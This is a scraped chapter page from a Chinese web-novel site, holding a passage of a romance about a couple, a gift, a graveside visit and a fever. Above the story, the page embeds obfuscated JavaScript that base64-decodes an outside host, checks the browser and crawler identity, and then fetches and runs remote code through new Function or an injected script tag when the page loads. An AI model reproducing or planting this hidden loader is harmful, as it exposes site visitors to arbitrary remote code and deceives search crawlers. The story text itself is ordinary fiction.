98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(60(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

宋若摇头我不爱你。

你爱我。孟璟纠正,胸有成竹又带点气鼓鼓,你否认也是没有用的。否则我不见了你会那么焦急?你管我呢。

就是家里的小猫走丢了,我也会急。宋若彻底恢复了冷静,能够有理有据地反击了,再说我是怕你丢了我无法和爷爷交代。

可是我亲老婆的时候,老婆浑身发软耶。孟璟开始不怀好意,带着邪笑,身体是最诚实的,不喜欢我你就推开我啦,可是你非但没有,还

宋若不知道童言无忌的年龄上限是几岁,也不懂为什么大鲸鱼说任何话题都能面不改色,反正她连耳朵都烧起来,赶紧切断她的话你大晚上跑出去干嘛?

孟璟从左边口袋里掏出来个蓝色的小鲸鱼挂件,递到未婚妻跟前,我知道今天又让老婆担心了,所以去买一个小礼物,赔礼道歉。没料到会下雪,还没道成歉呢,又害你连夜跑出去接我当然你会说这种东西,明天买也没有什么损失。可是我不想我们之间的不愉快隔了一晚上还没解决,这叫做当日事当日毕。

她开车来的路上发现这家只卖小挂件的精品店。

宋若踟蹰地盯着那只q版鲸鱼,没有去接。

以及如果丢的不是那个链子,而是别的什么,比如我手机掉进湖里,那我肯定不会下去捞的。孟璟不疾不徐地说,因为是你给的,所以特别重要。别的还可以再买。但定情信物丢了的话,不吉利。所以不行。必须找回来。

窗外北风呼号。

屋内静了几秒。

鲸鱼说的,她怎会不懂。

正因为懂了,才更加如坐针毡。

也因为懂了,她的部分情绪已不受自己控制。

小鲸鱼还悬在她跟前。

她抬手接过来,拿过手机,将它当作挂件拴好。

未婚妻垂着睫毛,表情很认真。孟璟微微一笑。

好了,快睡觉吧。宋若对她说。

孟璟向前微倾,两只手肘撑在她膝头,仰脸笑得露出八颗牙,原谅我了吗?

原谅了。宋若点头。又摇头,我没生气。

孟璟忽然抬身,在她唇上烙上一吻,带着笑意老婆真好。晚安。

说完也不给反应时间,三下两下在地铺上躺好了。

宋若被这突如其来的晚安吻弄得一懵,半晌才捂着嘴。脑子里一片浆糊。

她知道自己麻烦大了。

万事开头难,开了今晚这个先河,大鲸鱼只怕会进入想亲就亲的模式。

她稍微收拾了一下,默默躺下,熄了大灯,留一盏小灯。

次日被表弟的叫声吵醒。

他哇啦哇啦乱叫,不知抱怨些什么。

宋若边梳头边细听,才知道大雪不但停了,还融化了,他堆雪人打雪仗的美梦告吹,十分难过。

孟璟还睡着,紧紧裹着被子,脑袋也埋在被窝里。

宋若不去吵她,去外边帮忙弄早餐。

原计划这一天是要去祭拜祖父。昨晚姑姑说下雪了,要改个时间。谁成想今早雪又停了。于是照旧。孟璟没让人叫她起床,很自觉地踩点起,坐在未婚妻身边,胃口却不是很好,只喝了一小碗粥。

宋爷爷安息在这个小城的公共墓园,座落在郊区。

一家子上午八点出发,坐姑父开的车,雪化以后,有一段路十分泥泞。

快九点才到达目的地。进入墓园以后还绕了二十分钟,最终在一座石碑跟前停下。

姑姑红着眼眶和老人唠嗑,仿佛别后小叙。还拉过宋若和孟璟,说道爸,若若和孟璟也来看您。

宋若从早饭桌上就发现了,鲸鱼今天有些无精打采,她以为她是由于不喜欢这样的封建迷信活动,尤其要来祭奠的,还是一个素不相识的亡魂。没想到这会儿她又活跃了起来,揽着她的肩,也学着姑姑的样子,和老人说话,也中规中矩,像是爷爷放心,我会好好照顾若若之类的,对于活人和故去的人,都有慰藉作用的言词。

午饭前大家回到家。

中午饭鲸鱼也没吃多少,吃完还去午睡。

宋若觉得哪里透着古怪,等她歇了一小时午觉还没起,她终于怀疑起来,到房间看她,只见鲸鱼睡着,脸颊粉粉的。伸手一摸额头,果然滚烫。

宋若自责起来。半晌叫醒了鲸鱼,拿体温计过来给她测了个体温,自己坐在旁边守着。

孟璟一双眼睛格外亮,分不清楚是被烧得两眼冒光,还是她眼瞳原本就这么亮。

体温测试结果,三十九度五。

宋若咬牙,想骂人,忍住了,轻声说你是怎么搞的,自己不舒服也不知道?

孟璟虽然发着烧,脑子些微有点混沌,却还是忍不住笑起来不就是着凉,我睡一觉就好了。

发烧不吃药能好?

我是要做攻的人。快烧傻了还不忘这件事,孟璟很佩服自己,怎么能这么娇弱。

宋若要起身,被她抓住了。

干嘛,给你拿药去。宋若示意她松手。

别的不管用,你亲我一下,我就好了。这位病友如是说。

宋若头疼,不想再和这思维不同频的海洋生物瞎扯,轻轻剥开她的手,去向姑姑要了家里储备的退烧药,倒了水回到房间,挨着鲸鱼席地而坐,看她吃了药,嘱咐道睡一觉。要是下午还不好,就要看医生。

眼看孟璟要卧倒,宋若扶着她的肩,朝床上指了指,睡那。

鲸鱼从善如流,乖乖地上床睡了。睡着的样子有点可怜。

宋若把两床被子都替她盖上。以免她怕冷。

下午退了烧,晚饭也睡过去了,熬的粥只喝了两口。

宋若晚上洗漱完回到房间,只见抹香鲸已经又躺回了地上的被窝。床上的被子给她铺好了。

鲸鱼醒着,两只眼睛亮晶晶的。

宋若没说什么,收拾好躺下,照例把大灯熄了,留一盏小灯,半晌听见鲸鱼轻轻打了个喷嚏。过了会儿,又打了个喷嚏,还窸窸窣窣说了句好冷。

宋若皱眉,探手打开大灯,眼睛乍然适应不了强光,微微眯起。

床下的鲸鱼抬手挡着眼睛,唔?了一声。

上来。宋若说。

鲸鱼舔舔自己的唇珠,老婆想干嘛?

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间